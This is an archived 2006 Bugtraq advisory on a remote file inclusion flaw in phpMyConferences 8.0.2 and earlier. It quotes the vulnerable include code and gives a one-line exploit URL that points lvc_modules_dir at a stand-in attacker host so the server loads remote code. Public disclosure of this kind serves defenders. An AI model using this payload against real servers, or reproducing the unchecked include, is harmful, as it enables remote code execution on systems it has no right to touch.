Bugtraq mailing list archives
phpMyConferences <= 8.0.2 Remote File Inclusion
From: mfp.c () hotmail com
Date: 31 Oct 2006 15:56:01 -0000
# phpMyConferences <= 8.0.2 Remote File Inclusion # # Found by mfp.c => mfp.c () hotmail com [brazil rlz] # # Greetz: F-117, Silver lords e pra tu pri :* ################################################ # # # Arquivo: library.inc.php # # Bug: # if (!$gloaded_modules[$image_name]) # { # include($lvc_modules_dir.'/'.$module_name.'.module.php'); # $gloaded_modules[$module_name] = true; # } # # # Exploit: # # http://localhost/phpMyConferences_8.0.2/common/visiteurs/include/library.inc.php?lvc_modules_dir=http://attack/ # # # THANKS: Milw0rm,str0ke, google.... # # ###############################################
Current thread:
- phpMyConferences <= 8.0.2 Remote File Inclusion k1tk4t (Oct 13)
- <Possible follow-ups>
- phpMyConferences <= 8.0.2 Remote File Inclusion mfp . c (Oct 31)